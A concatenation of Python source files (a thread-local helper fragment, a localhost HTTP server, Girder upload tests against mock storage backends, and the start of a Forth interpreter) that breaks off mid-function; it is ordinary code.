self.__init__(*args, **kw)
with impl.locallock:
object.__setattr__(self, '__dict__', dct)
yield
class local:
__slots__ = '_local__impl', '__dict__'
def __new__(cls, *args, **kw):
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
self = object.__new__(cls)
impl = _localimpl()
impl.localargs = (args, kw)
impl.locallock = RLock()
object.__setattr__(self, '_local__impl', impl)
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
impl.create_dict()
return self
def __getattribute__(self, name):
with _patch(self):
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__setattr__(self, name, value)
def __delattr__(self, name):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__delattr__(self, name)
from threading import current_thread, RLock
|
server.py
|
"""
Software License Agreement (Apache 2.0)
Copyright (c) 2020, The MITRE Corporation.
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This project was developed by The MITRE Corporation.
If this code is used in a deployment or embedded within another project,
it is requested that you send an email to opensource@mitre.org in order to
let us know where this software is being used.
"""
# Adapted from https://docs.python.org/3/library/http.server.html
import functools
import http.server
# import os
import threading
from demodocusfw.utils import ROOT_DIR
PORT = None
class ThreadedHTTPServer(object):
def __init__(self, host, port, path=None,
request_handler=http.server.SimpleHTTPRequestHandler):
if path is None:
path = ROOT_DIR
self.path = path
# Requires >= python 3.7
request_handler = functools.partial(request_handler, directory=str(path))
request_handler.directory = str(path)
self.server = http.server.HTTPServer((host, port), request_handler)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
print(f"Serving {self.path} on port {self.server.server_address[1]} in thread {self.server_thread.name}")
self.server_thread.start()
def stop(self):
print("Stopping server loop")
self.server.shutdown()
self.server.server_close()
def __del__(self):
self.stop()
def __exit__(self, type, value, traceback):
self.stop()
server = None
def start():
global PORT, server
# Port 0 means to select an arbitrary unused port
HOST, PORT = "localhost", 0
server = ThreadedHTTPServer(HOST, PORT)
ip, PORT = server.server.server_address
server.start()
def stop():
global server
server.stop()
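# Minimal usage sketch (illustration only, not part of the original module): start the
# server on an ephemeral port, fetch the served directory listing once, then stop it.
if __name__ == "__main__":
    import urllib.request
    start()
    with urllib.request.urlopen(f"http://localhost:{PORT}/") as resp:
        print(resp.status, "from port", PORT)
    stop()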
|
upload_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2014 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import boto3
import json
import os
import re
import requests
import six
import threading
from six.moves import range
from girder import events
from girder.models.assetstore import Assetstore
from girder.models.file import File
from girder.models.folder import Folder
from girder.models.upload import Upload
from girder.models.user import User
from girder.utility import assetstore_utilities
from .. import base
from .. import mongo_replicaset
Chunk1, Chunk2 = ('hello ', 'world')
def setUpModule():
base.startServer(mockS3=True)
def tearDownModule():
base.stopServer()
def _send_s3_request(req, data=None):
    resp = requests.request(
        method=req['method'], url=req['url'], headers=req.get('headers', {}), data=data)
    if resp.status_code != 200:
        raise Exception('Moto S3 request error %d: %s' % (resp.status_code, resp.text))
    return resp
class UploadTestCase(base.TestCase):
def setUp(self):
base.TestCase.setUp(self)
admin = {
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'Admin',
'lastName': 'Admin',
'password': 'adminpassword',
'admin': True
}
self.admin = User().createUser(**admin)
user = {
'email': 'good@email.com',
'login': 'goodlogin',
'firstName': 'First',
'lastName': 'Last',
'password': 'goodpassword',
'admin': False
}
self.user = User().createUser(**user)
folders = Folder().childFolders(parent=self.user, parentType='user', user=self.user)
for folder in folders:
if folder['public'] is True:
self.folder = folder
def _uploadFile(self, name, partial=False, largeFile=False):
"""
Upload a file either completely or partially.
:param name: the name of the file to upload.
:param partial: the number of steps to complete in the uploads: 0
initializes the upload, 1 uploads 1 chunk, etc. False
to complete the upload.
:param largeFile: if True, upload a file that is > 32Mb
:returns: the upload record which includes the upload id.
"""
if largeFile:
chunk1 = '-' * (1024 * 1024 * 32)
chunk2 = '-' * (1024 * 1024 * 1)
else:
chunk1 = Chunk1
chunk2 = Chunk2
resp = self.request(
path='/file', method='POST', user=self.user, params={
'parentType': 'folder',
'parentId': self.folder['_id'],
'name': name,
'size': len(chunk1) + len(chunk2),
'mimeType': 'text/plain'
})
self.assertStatusOk(resp)
upload = resp.json
if partial is not False and partial == 0:
return upload
if 's3' not in upload:
fields = [('offset', 0), ('uploadId', upload['_id'])]
files = [('chunk', 'helloWorld.txt', chunk1)]
resp = self.multipartRequest(
path='/file/chunk', user=self.user, fields=fields, files=files)
self.assertStatusOk(resp)
if partial is not False:
return resp.json
fields = [('offset', len(chunk1)), ('uploadId', upload['_id'])]
files = [('chunk', 'helloWorld.txt', chunk2)]
resp = self.multipartRequest(
path='/file/chunk', user=self.user, fields=fields, files=files)
self.assertStatusOk(resp)
return upload
# s3 uses a different method for uploading chunks
# This has no error checking at all
if not upload['s3']['chunked']:
_send_s3_request(upload['s3']['request'], chunk1+chunk2)
if partial is not False:
return
else:
chunk1 = chunk1+chunk2
s3resp = _send_s3_request(upload['s3']['request'])
matches = re.search('<UploadId>(.*)</UploadId>', s3resp.text)
s3uploadId = matches.groups()[0]
offset = 0
chunkN = 1
etags = []
while len(chunk1):
params = {'offset': offset, 'uploadId': upload['_id']}
params['chunk'] = json.dumps({'s3UploadId': s3uploadId,
'partNumber': chunkN})
resp = self.request(
path='/file/chunk', method='POST', user=self.user, params=params)
self.assertStatusOk(resp)
upload = resp.json
if len(chunk1) > upload['s3']['chunkLength']:
chunk2 = chunk1[upload['s3']['chunkLength']:]
chunk1 = chunk1[:upload['s3']['chunkLength']]
else:
chunk2 = ""
resp = _send_s3_request(upload['s3']['request'], chunk1)
etags.append(resp.headers['ETag'])
chunk1 = chunk2
if partial is not False:
partial -= 1
chunkN += 1
if partial is not False and not partial:
return upload
resp = self.request(
path='/file/completion', method='POST', user=self.user,
params={'uploadId': upload['_id']})
self.assertStatusOk(resp)
if 's3FinalizeRequest' in resp.json:
xml = '<CompleteMultipartUpload>'
for i, tag in enumerate(etags, 1):
xml += '<Part><PartNumber>%d</PartNumber><ETag>%s</ETag></Part>' % (i, tag)
xml += '</CompleteMultipartUpload>'
_send_s3_request(resp.json['s3FinalizeRequest'], data=xml)
return upload
def _uploadFileWithInitialChunk(self, name, partial=False, largeFile=False, oneChunk=False):
"""
Upload a file either completely or partially, sending the first chunk
with the initial POST.
:param name: the name of the file to upload.
:param partial: the number of steps to complete in the uploads: 1
uploads 1 chunk. False to complete the upload.
:param largeFile: if True, upload a file that is > 32Mb
:param oneChunk: if True, upload everything as one chunk. Otherwise,
upload one chunk when creating the upload and one via the
file/chunk endpoint.
:returns: the upload record which includes the upload id.
"""
if not largeFile:
chunk1 = Chunk1
chunk2 = Chunk2
else:
chunk1 = '-' * (1024 * 1024 * 32)
chunk2 = '-' * (1024 * 1024 * 1)
if oneChunk:
chunk1 += chunk2
chunk2 = ''
params = {
'parentType': 'folder',
'parentId': str(self.folder['_id']),
'name': name,
'size': len(chunk1) + len(chunk2),
'mimeType': 'text/plain',
}
resp = self.request(
path='/file', method='POST', user=self.user,
params=params, body=chunk1, type='text/plain')
self.assertStatusOk(resp)
if partial is not False:
return resp.json
if not oneChunk:
upload = resp.json
params = {'offset': len(chunk1), 'uploadId': upload['_id']}
resp = self.request(
path='/file/chunk', method='POST', user=self.user,
params=params, body=chunk2, type='text/plain')
self.assertStatusOk(resp)
else:
upload = None
self.assertEqual(resp.json['_modelType'], 'file')
return upload
def _testUpload(self):
"""
Upload a file to the server and several partial files. Test that we
can delete a partial upload but not a completed upload. Test that we
can delete partial uploads that are older than a certain date.
"""
completeUpload = self._uploadFile('complete_upload')
# test uploading large files and one-chunk files
self._uploadFile('complete_large_upload', largeFile=True)
self._uploadFileWithInitialChunk('one_chunk_upload', oneChunk=True)
# test partial uploads
partialUploads = []
for largeFile in (False, True):
for partial in range(3):
partialUploads.append(self._uploadFile(
'partial_upload_%d_%s' % (partial, str(largeFile)),
partial, largeFile))
# The admin user should see all of the partial uploads, but not the
# complete uploads
resp = self.request(path='/system/uploads', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), len(partialUploads))
# We shouldn't be able to delete a completed upload
resp = self.request(
path='/system/uploads', method='DELETE', user=self.admin,
params={'uploadId': completeUpload['_id']})
self.assertStatusOk(resp)
self.assertEqual(resp.json, [])
resp = self.request(path='/system/uploads', user=self.admin)
self.assertEqual(len(resp.json), len(partialUploads))
# The admin should be able to ask for a partial upload by id
resp = self.request(
path='/system/uploads', user=self.admin,
params={'uploadId': partialUploads[0]['_id']})
self.assertStatusOk(resp)
self.assertEqual(resp.json[0]['_id'], partialUploads[0]['_id'])
# The admin should be able to ask for a partial upload by assetstore id
resp = self.request(
path='/system/uploads', user=self.admin,
params={'assetstoreId': self.assetstore['_id']})
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), len(partialUploads))
# The admin should be able to ask for a partial upload by age.
# Everything should be more than 0 days old
resp = self.request(
path='/system/uploads', user=self.admin, params={'minimumAge': 0})
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), len(partialUploads))
# The admin should be able to delete an upload
resp = self.request(
path='/system/uploads', method='DELETE', user=self.admin,
params={'uploadId': partialUploads[0]['_id']})
self.assertStatusOk(resp)
self.assertEqual(resp.json[0]['_id'], partialUploads[0]['_id'])
# We should now have one less partial upload
resp = self.request(path='/system/uploads', user=self.admin)
self.assertEqual(len(resp.json), len(partialUploads)-1)
# If we ask to delete everything more than one day old, nothing should
# be deleted.
resp = self.request(
path='/system/uploads', method='DELETE', user=self.admin, params={'minimumAge': 1})
self.assertStatusOk(resp)
self.assertEqual(resp.json, [])
# Delete all partial uploads
resp = self.request(path='/system/uploads', method='DELETE', user=self.admin)
self.assertStatusOk(resp)
resp = self.request(path='/system/uploads', user=self.admin)
self.assertEqual(resp.json, [])
def testUploadWithInitialChunk(self):
"""
Upload a file to the server and several partial files. Test that we
can delete a partial upload but not a completed upload. Test that we
can delete partial uploads that are older than a certain date.
"""
self._uploadFileWithInitialChunk('upload1')
self._uploadFileWithInitialChunk('upload2', oneChunk=True)
# test uploading large files
self._uploadFileWithInitialChunk('upload3', largeFile=True)
partialUploads = []
for largeFile in (False, True):
for partial in range(1, 3):
partialUploads.append(self._uploadFileWithInitialChunk(
'partial_upload_%d_%s' % (partial, str(largeFile)),
partial, largeFile))
# check that a user cannot list partial uploads
resp = self.request(path='/system/uploads', method='GET',
user=self.user)
self.assertStatus(resp, 403)
# The admin user should see all of the partial uploads, but not the
# complete upload
resp = self.request(path='/system/uploads', method='GET',
user=self.admin)
self.assertStatusOk(resp)
foundUploads = resp.json
self.assertEqual(len(foundUploads), len(partialUploads))
# Check that the upload model is saved when we are using one chunk
self._uploadWasSaved = 0
def trackUploads(*args, **kwargs):
self._uploadWasSaved += 1
events.bind('model.upload.save', 'uploadWithInitialChunk', trackUploads)
self._uploadFileWithInitialChunk('upload4', oneChunk=True)
# This can be changed to assertEqual if one chunk uploads aren't saved
self.assertGreater(self._uploadWasSaved, 0)
self._uploadWasSaved = 0
# But that it is saved when using multiple chunks
self._uploadFileWithInitialChunk('upload5')
self.assertGreater(self._uploadWasSaved, 0)
events.unbind('model.upload.save', 'uploadWithInitialChunk')
def testFilesystemAssetstoreUpload(self):
self._testUpload()
# Test that a delete during an upload still results in one file
adapter = assetstore_utilities.getAssetstoreAdapter(self.assetstore)
size = 101
data = six.BytesIO(b' ' * size)
files = []
files.append(Upload().uploadFromFile(
data, size, 'progress', parentType='folder', parent=self.folder,
assetstore=self.assetstore))
fullPath0 = adapter.fullPath(files[0])
conditionRemoveDone = threading.Condition()
conditionInEvent = threading.Condition()
def waitForCondition(*args, **kwargs):
            # Signal that we are in the event and then wait to be told that
            # the delete has occurred before returning.
with conditionInEvent:
conditionInEvent.notify()
with conditionRemoveDone:
conditionRemoveDone.wait()
def uploadFileWithWait():
size = 101
data = six.BytesIO(b' ' * size)
files.append(Upload().uploadFromFile(
data, size, 'progress', parentType='folder', parent=self.folder,
assetstore=self.assetstore))
events.bind('model.file.finalizeUpload.before', 'waitForCondition',
waitForCondition)
# We create an upload that is bound to an event that waits during the
# finalizeUpload.before event so that the remove will be executed
# during this time.
with conditionInEvent:
t = threading.Thread(target=uploadFileWithWait)
t.start()
conditionInEvent.wait()
self.assertTrue(os.path.exists(fullPath0))
File().remove(files[0])
# We shouldn't actually remove the file here
self.assertTrue(os.path.exists(fullPath0))
with conditionRemoveDone:
conditionRemoveDone.notify()
t.join()
events.unbind('model.file.finalizeUpload.before', 'waitForCondition')
fullPath1 = adapter.fullPath(files[0])
self.assertEqual(fullPath0, fullPath1)
self.assertTrue(os.path.exists(fullPath1))
def testGridFSAssetstoreUpload(self):
# Clear any old DB data
base.dropGridFSDatabase('girder_test_upload_assetstore')
# Clear the assetstore database and create a GridFS assetstore
Assetstore().remove(Assetstore().getCurrent())
assetstore = Assetstore().createGridFsAssetstore(
name='Test', db='girder_test_upload_assetstore')
self.assetstore = assetstore
self._testUpload()
def testGridFSReplicaSetAssetstoreUpload(self):
verbose = 0
if 'REPLICASET' in os.environ.get('EXTRADEBUG', '').split():
verbose = 2
# Starting the replica sets takes time (~25 seconds)
rscfg = mongo_replicaset.makeConfig()
mongo_replicaset.startMongoReplicaSet(rscfg, verbose=verbose)
# Clear the assetstore database and create a GridFS assetstore
Assetstore().remove(Assetstore().getCurrent())
# When the mongo connection to one of the replica sets goes down, it
# takes twice the socket timeout for us to reconnect and get on with
# an upload. We can override the default timeout by passing it as a
# mongodb uri parameter.
assetstore = Assetstore().createGridFsAssetstore(
name='Test', db='girder_assetstore_rs_upload_test',
mongohost='mongodb://127.0.0.1:27070,127.0.0.1:27071,'
'127.0.0.1:27072/?socketTimeoutMS=5000&connectTimeoutMS=2500',
replicaset='replicaset')
self.assetstore = assetstore
self._testUpload()
# Test having the primary replica set going offline and then uploading
# again. If the current primary goes offline, it seems to take mongo
# 30 seconds to elect a new primary. If we step down the current
# primary before pausing it, then the new election will happen in 20
# seconds.
mongo_replicaset.stepDownMongoReplicaSet(rscfg, 0)
mongo_replicaset.waitForRSStatus(
rscfg,
mongo_replicaset.getMongoClient(rscfg, 0),
status=[2, (1, 2), (1, 2)],
verbose=verbose)
mongo_replicaset.pauseMongoReplicaSet(rscfg, [True], verbose=verbose)
self._uploadFile('rs_upload_1')
# Have a different member of the replica set go offline and the first
# come back. This takes a long time, so I am disabling it
# mongo_replicaset.pauseMongoReplicaSet(rscfg, [False, True], verbose=verbose)
# self._uploadFile('rs_upload_2')
# Have the set come back online and upload once more
mongo_replicaset.pauseMongoReplicaSet(rscfg, [False, False], verbose=verbose)
self._uploadFile('rs_upload_3')
mongo_replicaset.stopMongoReplicaSet(rscfg)
def testGridFSShardingAssetstoreUpload(self):
verbose = 0
if 'REPLICASET' in os.environ.get('EXTRADEBUG', '').split():
verbose = 2
# Starting the sharding service takes time
rscfg = mongo_replicaset.makeConfig(port=27073, shard=True, sharddb=None)
mongo_replicaset.startMongoReplicaSet(rscfg, verbose=verbose)
# Clear the assetstore database and create a GridFS assetstore
Assetstore().remove(Assetstore().getCurrent())
self.assetstore = Assetstore().createGridFsAssetstore(
name='Test', db='girder_assetstore_shard_upload_test',
mongohost='mongodb://127.0.0.1:27073', shard='auto')
self._testUpload()
# Verify that we have successfully sharded the collection
adapter = assetstore_utilities.getAssetstoreAdapter(self.assetstore)
stat = adapter.chunkColl.database.command('collstats', adapter.chunkColl.name)
self.assertTrue(bool(stat['sharded']))
# Although we have asked for multiple shards, the chunks may all be on
# one shard. Make sure at least one shard is reported.
self.assertGreaterEqual(len(stat['shards']), 1)
# Asking for the same database again should also report sharding. Use
        # a slightly different URI to ensure that the sharding is checked anew.
assetstore = Assetstore().createGridFsAssetstore(
name='Test 2', db='girder_assetstore_shard_upload_test',
mongohost='mongodb://127.0.0.1:27073/?', shard='auto')
adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
stat = adapter.chunkColl.database.command('collstats', adapter.chunkColl.name)
self.assertTrue(bool(stat['sharded']))
mongo_replicaset.stopMongoReplicaSet(rscfg)
def testS3AssetstoreUpload(self):
# Clear the assetstore database and create an S3 assetstore
Assetstore().remove(self.assetstore)
params = {
'name': 'S3 Assetstore',
'bucket': 'bucketname',
'prefix': 'testprefix',
'accessKeyId': 'abc',
'secret': '123',
'service': base.mockS3Server.service
}
assetstore = Assetstore().createS3Assetstore(**params)
self.assetstore = assetstore
self._testUpload()
# make an untracked upload to test that we can find and clear it
client = boto3.client(
's3', endpoint_url=base.mockS3Server.service, aws_access_key_id='abc',
aws_secret_access_key='123')
client.create_multipart_upload(Bucket='bucketname', Key='testprefix/abandoned_upload')
resp = self.request(path='/system/uploads', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
# Ask to delete it
resp = self.request(path='/system/uploads', method='DELETE', user=self.admin)
self.assertStatusOk(resp)
# Check that it is gone
resp = self.request(path='/system/uploads', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(resp.json, [])
|
nuc.py
|
from __future__ import print_function
from __future__ import division
import sys
import getopt
import struct
from functools import partial
import operator
import array
import copy
import time
import re
if sys.version_info[0] < 3:
input = raw_input
sys.path.append("../shell")
import swapforth
def truth(pred):
return [0, -1][pred]
def setimmediate(func):
func.is_immediate = True
return func
def ba(x):
if type(x) == str:
return array.array('B', [ord(c) for c in x])
elif type(x) == bytes:
return array.array('B', x)
else:
return array.array('B', str(x))
def array2bytes(a):
if hasattr(array.array, 'tostring'):
return a.tostring()
else:
return a.tobytes()
class ForthException(Exception):
def __init__(self, value):
self.value = value
class SwapForth:
def __init__(self, CELL = 4, ENDIAN = '<'):
self.d = [] # data stack
self.r = [] # return stack
self.dict = {} # the dictionary
self.xts = [] # execution token (xt) table
self.ip = 0 # instruction pointer for inner interpreter
self.loopC = 0 # loop count
self.loopL = 0 # loop limit
self.leaves = [] # tracking LEAVEs from DO..LOOP
self.ram = array.array('B') # memory
self.out = sys.stdout.write # default console output
self.CELL = CELL
self.CSIGN = (256 ** self.CELL) >> 1 # Sign bit mask
self.CMASK = (256 ** self.CELL) - 1 # Cell mask
self.cellfmt = ENDIAN + {2: 'h', 4: 'i', 8: 'q'}[self.CELL]
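        # With the default CELL=4 and ENDIAN='<' this gives CSIGN=0x80000000,
        # CMASK=0xFFFFFFFF and cellfmt='<i' (little-endian 32-bit signed int).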
def allot(n, d):
r = partial(self.lit, len(self.ram))
r.__doc__ = d
self.ram.extend([0] * n)
return r
self.tib = allot(256, "TIB")
self.sourcea = allot(self.CELL, "SOURCEA")
self.sourcec = allot(self.CELL, "SOURCEC")
self.sourceid = allot(self.CELL, "SOURCEID")
self.to_in = allot(self.CELL, ">IN")
self.base = allot(self.CELL, "BASE")
self.state = allot(self.CELL, "STATE")
# Run through own bound methods, adding each to the dict
isforth = re.compile(r"[A-Z0-9<>=\-\[\],@!:;+?/*]+$")
for name in dir(self):
o = getattr(self, name)
if not isforth.match(name) and o.__doc__:
# name was not a valid Forth name; try start of the docstring
name = o.__doc__.split()[0]
if callable(o) and isforth.match(name):
self.dict[name] = o
self.DECIMAL()
def u32(self, x):
return x & self.CMASK
def w32(self, x):
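        # Wrap x to a signed CELL-wide value: with CELL=4, w32(0xFFFFFFFF) == -1
        # and w32(0x7FFFFFFF) == 0x7FFFFFFF.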
x += self.CSIGN
x &= self.CMASK
x -= self.CSIGN
return x
def lit(self, n):
""" push literal N on the stack """
self.d.append(n)
def popn(self, n):
r = self.d[-n:]
self.d = self.d[:-n]
return r
def q(self, s):
for w in s.split():
if w in self.dict:
self.dict[w]()
else:
self.lit(int(w))
def binary(self, op):
b = self.d.pop()
self.d[-1] = self.w32(op(self.d[-1], b))
def dpop(self):
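        # Pop a double-cell value: the high cell sits on top of the stack and
        # the low cell beneath it (dlit below pushes them in the same order).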
r = self.d.pop() << (8 * self.CELL)
r += self.d.pop() & self.CMASK
return r
def dlit(self, d):
self.lit(self.w32(d & self.CMASK))
self.lit(self.w32(d >> (8 * self.CELL)))
def pops(self):
n = self.d.pop()
a = self.d.pop()
return array2bytes(self.ram[a:a+n]).decode("utf-8")
# Start of Forth words
#
# If the word is a legal Python identifier, then
# use that name. Otherwise (e.g. '+') the Forth name is in
# the docstring.
def HERE(self):
self.lit(len(self.ram))
def THROW(self):
e = self.d.pop()
if e:
raise ForthException(e)
def CATCH(self):
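        # Save the input source spec and the stack depths, EXECUTE the xt on
        # top of the data stack, and either push 0 on success or restore the
        # saved state and push the THROW code if a ForthException is raised.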
self.q('SOURCEA @ SOURCEC @ >IN @')
self.q('SOURCEID @ >R')
source_spec = self.popn(3)
(ds,rs,ip) = (len(self.d) - 1, len(self.r), self.ip)
try:
self.EXECUTE()
except ForthException as e:
if len(self.d) > ds:
self.d = self.d[:ds]
else:
self.d = self.d + [0] * (ds - len(self.d))
self.r = self.r[:rs]
self.ip = ip
self.lit(source_spec[0])
self.lit(source_spec[1])
self.lit(source_spec[2])
self.q('R> SOURCEID !')
self.q('>IN ! SOURCEC ! SOURCEA !')
self.lit(e.value)
else:
self.lit(0)
def cell_plus(self):
""" CELL+ """
self.d[-1] += self.CELL
def DEPTH(self):
self.lit(len(self.d))
def SOURCE(self):
self.sourcea()
self.fetch()
self.sourcec()
self.fetch()
def fetch(self):
""" @ """
a = self.d.pop()
self.lit(*struct.unpack(self.cellfmt, self.ram[a:a + self.CELL]))
def c_fetch(self):
""" C@ """
a = self.d.pop()
self.lit(self.ram[a])
def store(self):
""" ! """
a = self.d.pop()
x = self.d.pop()
self.ram[a:a + self.CELL] = array.array('B', struct.pack(self.cellfmt, x))
def c_store(self):
""" C! """
a = self.d.pop()
x = self.d.pop()
self.ram[a] = x & 0xff
def comma(self):
""" , """
self.ram.extend(ba(struct.pack(self.cellfmt, self.d.pop())))
def c_comma(self):
""" C, """
self.ram.extend([self.d.pop()])
def slash_string(self):
""" /STRING """
n = self.d.pop()
self.d[-2] += n
self.d[-1] -= n
def PARSE(self):
delim = self.d.pop()
self.q('SOURCE >IN @ /STRING')
self.q('OVER >R')
while True:
if self.d[-1] == 0:
break
if (self.ram[self.d[-2]]) == delim:
break
self.lit(1)
self.slash_string()
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def parse_name(self):
""" PARSE-NAME """
self.q('SOURCE >IN @ /STRING')
def skip(pred):
while True:
if self.d[-1] == 0:
break
if not pred(self.ram[self.d[-2]]):
break
self.lit(1)
self.slash_string()
skip(lambda x: x == 32)
self.q('OVER >R')
skip(lambda x: x != 32)
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def DUP(self):
self.d.append(self.d[-1])
def DROP(self):
self.d.pop()
def NIP(self):
self.d.pop(-2)
def two_drop(self):
""" 2DROP """
self.d.pop()
self.d.pop()
def SWAP(self):
(self.d[-2], self.d[-1]) = (self.d[-1], self.d[-2])
def two_swap(self):
""" 2SWAP """
(self.d[-4], self.d[-3], self.d[-2], self.d[-1]) = (self.d[-2], self.d[-1], self.d[-4], self.d[-3])
def two_over(self):
""" 2OVER """
self.lit(self.d[-4])
self.lit(self.d[-4])
def OVER(self):
self.lit(self.d[-2])
def TUCK(self):
self.SWAP()
self.OVER()
def two_dup(self):
""" 2DUP """
self.d += self.d[-2:]
def to_r(self):
""" >R """
self.r.append(self.d.pop())
def r_from(self):
""" R> """
self.d.append(self.r.pop())
def r_fetch(self):
""" R@ """
self.d.append(self.r[-1])
def n_to_r(self):
""" N>R """
n = self.d.pop()
if n:
self.r += self.d[-n:]
self.d = self.d[:-n]
self.r.append(n)
def n_r_from(self):
""" NR> """
n = self.r.pop()
if n:
self.d += self.r[-n:]
self.r = self.r[:-n]
self.lit(n)
def plus(self):
""" + """
self.binary(operator.__add__)
def minus(self):
""" - """
self.binary(operator.__sub__)
def _and(self):
""" AND """
self.binary(operator.__and__)
def _or(self):
""" OR """
self.binary(operator.__or__)
def _xor(self):
""" XOR """
self.binary(operator.__xor__)
def LSHIFT(self):
self.binary(operator.__lshift__)
def RSHIFT(self):
self.binary(lambda a, b: (a & self.CMASK) >> b)
def two_slash(self):
""" 2/ """
self.d[-1] >>= 1
def equal(self):
""" = """
self.binary(lambda a, b: truth(a == b))
def less_than(self):
""" < """
self.binary(lambda a, b: truth(a < b))
def u_less_than(self):
""" U< """
self.binary(lambda a, b: truth((a & self.CMASK) < (b & self.CMASK)))
def NEGATE(self):
self.d[-1] = self.w32(-self.d[-1])
def INVERT(self):
self.d[-1] = self.w32(self.d[-1] ^ self.CMASK)
def MIN(self):
self.lit(min(self.d.pop(), self.d.pop()))
def MAX(self):
self.lit(max(self.d.pop(), self.d.pop()))
def dplus(self):
""" D+ """
self.dlit(self.dpop() + self.dpop())
def u_m_star(self):
""" UM* """
self.dlit(self.u32(self.d.pop()) * self.u32(self.d.pop()))
def star(self):
""" * """
self.binary(operator.__mul__)
def u_m_slash_mod(self):
""" UM/MOD """
u1 = self.u32(self.d.pop())
ud = self.dpop() & (65536**self.CELL - 1)
self.lit(self.w32(ud % u1))
self.lit(self.w32(ud // u1))
def MS(self):
time.sleep(0.001 * self.d.pop())
def EMIT(self):
self.out(chr(self.d.pop()))
def CR(self):
self.lit(ord('\n'))
self.EMIT()
def SPACE(self):
self.lit(ord(' '))
self.EMIT()
def BL(self):
self.lit(ord(' '))
def WORDS(self):
self.out(" ".join(self.dict))
def xt(self, c):
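        # Map a Python callable to an execution token: tokens are indices into
        # self.xts offset by 1000, so EXECUTE can recover the callable below.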
if not c in self.xts:
self.xts.append(c)
return self.xts.index(c) + 1000
def SFIND(self):
(a, n) = self.d[-2:]
s = array2bytes(self.ram[a:a+n]).decode("utf-8").upper()
# print('HERE', s.decode("utf-8"), self.dict)
if s in self.dict:
x = self.dict[s]
self.d[-2] = self.xt(x)
if hasattr(x, 'is_immediate'):
self.d[-1] = 1
else:
self.d[-1] = -1
else:
self.lit(0)
def EXECUTE(self):
x = self.d.pop()
self.xts[x - 1000]()
@setimmediate
def left_paren(self):
""" [ """
self.lit(0)
self.state()
self.store()
def right_paren(self):
""" ] """
self.lit(1)
self.state()
self.store()
def inner(self, code):
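        # Inner interpreter: run a compiled word (a list of callables) while
        # saving and restoring the caller's instruction pointer; branch and
        # zbranch implement control flow by reassigning self.ip, and EXIT ends
        # a word by setting ip past the end of the code list.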
save = self.ip
self.ip = 0
while self.ip < len(code):
c = code[self.ip]
self.ip += 1
c()
self.ip = save
def MARKER(self):
self.parse_name()
name = self.pops().upper()
def restore(here, dict):
del self.ram[here:]
self.dict = dict
self.dict[name] = partial(restore, len(self.ram), copy.copy(self.dict))
def mkheader(self):
self.parse_name()
self.code = []
self.defining = self.pops().upper()
def colon(self):
""" : """
self.mkheader()
self.right_paren()
def endcolon():
self.lastword = partial(self.inner, self.code)
if self.defining in self.dict:
                print('warning: redefining %s' % self.defining)
self.dict[self.defining] = self.lastword
self.dosemi = endcolon
@setimmediate
def semicolon(self):
""" ; """
self.dosemi()
self.left_paren()
@setimmediate
def RECURSE(self):
self.code.append(partial(self.inner, self.code))
def noname(self):
""" :NONAME """
self.code = []
self.right_paren()
def endnoname():
self.lit(self.xt(partial(self.inner, self.code)))
self.dosemi = endnoname
def IMMEDIATE(self):
setattr(self.lastword, 'is_immediate', True)
@setimmediate
def does(self):
""" DOES> """
def dodoes(code):
del self.code[1:]
self.code.append(partial(self.inner, code))
dobody = []
self.code.append(partial(dodoes, dobody))
self.semicolon()
self.right_paren()
self.code = dobody
self.dosemi = lambda: 0
def to_body(self):
""" >BODY """
code = self.xts[self.d.pop() - 1000].args[0]
code0 = code[0]
self.inner([code0])
def ALLOT(self):
self.ram.extend(ba(chr(0) * self.d.pop()))
@setimmediate
def POSTPONE(self):
self.parse_name()
self.SFIND()
if self.d[-1] == 0:
self.DROP()
assert 0, "Bad postpone %s" % self.pops()
if self.d.pop() < 0:
self.LITERAL()
self.lit(self.xt(self.compile_comma))
self.compile_comma()
def EXIT(self):
        self.ip = 99999999
def ACCEPT(self):
(a, n) = self.popn(2)
s = input()[:n]
ns = len(s)
        self.ram[a:a + ns] = ba(s)
self.lit(ns)
def to_number(self, base = None):
""" >NUMBER """
if base is None:
self.base()
self.fetch()
base = self.d.pop()
(a, n) = self.popn(2)
ud2 = self.dpop()
try:
while n:
ud2 = base * ud2 + int(chr(self.ram[a]), base)
a += 1
n -= 1
except ValueError:
pass
self.dlit(ud2)
self.lit(a)
self.lit(n)
def DECIMAL(self):
self.lit(10)
self.base()
self.store()
def compile_comma(self):
""" COMPILE, """
self.code.append(self.xts[self.d.pop() - 1000])
def branch(self, x):
self.ip = x
def zbranch(self, x):
if self.d.pop() == 0:
self.ip = x
@setimmediate
def BEGIN(self):
self.lit(len(self.code))
@setimmediate
def AGAIN(self):
